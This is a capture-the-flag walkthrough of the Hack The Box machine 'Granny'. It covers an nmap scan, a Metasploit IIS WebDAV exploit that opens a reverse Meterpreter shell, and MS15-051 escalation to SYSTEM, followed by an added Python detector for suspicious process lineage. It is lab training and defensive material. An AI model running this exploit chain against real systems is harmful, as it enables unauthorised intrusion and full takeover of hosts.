HTB: Granny

Details

This machine is Granny from Hack The Box

Recon Phase

Start with the service discovery

root@kali:~# nmap -sV -p- -T4 10.10.10.15
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-07 09:45 EDT
Nmap scan report for 10.10.10.15
Host is up (0.034s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 116.65 seconds

This looks very much like Grandpa...

Quick Owning

root@kali:~# msfconsole
msf5 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS 10.10.10.15
RHOSTS => 10.10.10.15
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set LHOST 10.10.14.35
LHOST => 10.10.14.35
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set LPORT 4444
LPORT => 4444
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit
[*] Started reverse TCP handler on 10.10.14.35:4444
[*] Trying path length 3 to 60 ...
[*] Sending stage (179779 bytes) to 10.10.10.15
[*] Meterpreter session 1 opened (10.10.14.35:4444 -> 10.10.10.15:1031) at 2019-07-07 09:50:33 -0400
meterpreter >

That's the first bit done

meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.
meterpreter > background
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf5 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 29 exploit checks are being tried...
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

So it is the same as Grandpa, also vulnerable to MS15-051

msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms15_051_client_copy_image
msf5 exploit(windows/local/ms15_051_client_copy_image) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/ms15_051_client_copy_image) > set LHOST 10.10.14.35
LHOST => 10.10.14.35
msf5 exploit(windows/local/ms15_051_client_copy_image) > exploit
[*] Started reverse TCP handler on 10.0.3.15:4444
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.

The session needs to migrate to another process on this one too

msf5 exploit(windows/local/ms15_051_client_copy_image) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > ps
Process List
============
 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 [SNIP]
 1828  608   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 [SNIP]
meterpreter > migrate 1828
[*] Migrating from 2144 to 1828...
[*] Migration completed successfully.
meterpreter > background
[*] Backgrounding session 1...

Now to own it

msf5 exploit(windows/local/ms15_051_client_copy_image) > exploit
[*] Started reverse TCP handler on 10.10.14.35:4444
[*] Launching notepad to host the exploit...
[+] Process 2180 launched.
[*] Reflectively injecting the exploit DLL into 2180...
[*] Injecting exploit into 2180...
[*] Exploit injected. Injecting payload into 2180...
[*] Payload injected. Executing exploit...
[*] Sending stage (179779 bytes) to 10.10.10.15
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 2 opened (10.10.14.35:4444 -> 10.10.10.15:1033) at 2019-07-07 09:58:45 -0400
meterpreter >
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

There we go

meterpreter > dir
Listing: C:\Documents and Settings\Lakis\Desktop
================================================
Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-04-12 15:19:57 -0400  user.txt
meterpreter > cat user.txt
[REDACTED]
meterpreter > dir
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================
Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-04-12 10:28:50 -0400  root.txt
meterpreter > cat root.txt
[REDACTED]
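
From the defender's side, the escalation above leaves a recognisable process lineage: notepad.exe launched from wmiprvse.exe under NETWORK SERVICE, then SYSTEM activity beneath it. The following is an added example, not part of the original walkthrough: a Python check over constructed process-creation records (the record layout, rule names, the cmd.exe child and every PID other than 1828 and 2180 are assumptions).

```python
import csv
import io

SYSTEM = "NT AUTHORITY\\SYSTEM"
# Service host processes that normally have no reason to start desktop programs.
SERVICE_HOSTS = {"w3wp.exe", "wmiprvse.exe"}
DESKTOP_APPS = {"notepad.exe", "calc.exe", "mspaint.exe"}

# Constructed records: time,pid,ppid,image,user. Only PIDs 1828 and 2180
# mirror the session above; everything else is made up for the example.
SAMPLE_EVENTS = """\
09:49:10,608,420,svchost.exe,NT AUTHORITY\\SYSTEM
09:49:12,1828,608,wmiprvse.exe,NT AUTHORITY\\NETWORK SERVICE
09:50:31,1460,608,w3wp.exe,NT AUTHORITY\\NETWORK SERVICE
09:58:40,2180,1828,notepad.exe,NT AUTHORITY\\NETWORK SERVICE
09:59:02,2312,2180,cmd.exe,NT AUTHORITY\\SYSTEM
10:01:15,2400,608,wmiprvse.exe,NT AUTHORITY\\SYSTEM
"""


def find_suspicious(log_text):
    """Return (pid, rule) pairs for process creations with an odd lineage."""
    seen = {}  # pid -> (image, user) of the most recent process with that pid
    alerts = []
    for row in csv.reader(io.StringIO(log_text)):
        if len(row) != 5:
            continue  # skip blank or malformed lines
        _time, pid, ppid, image, user = row
        image = image.lower()
        parent = seen.get(ppid)
        seen[pid] = (image, user)
        if parent is None:
            continue  # parent started before logging began
        parent_image, parent_user = parent
        # Rule 1: a service host process starts an interactive desktop program.
        if parent_image in SERVICE_HOSTS and image in DESKTOP_APPS:
            alerts.append((pid, "desktop-app-from-service-host"))
        # Rule 2: the child runs as SYSTEM although its parent was created
        # under a less privileged account.
        if user == SYSTEM and parent_user != SYSTEM:
            alerts.append((pid, "child-more-privileged-than-parent"))
    return alerts


if __name__ == "__main__":
    for pid, rule in find_suspicious(SAMPLE_EVENTS):
        print(pid, rule)
```
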
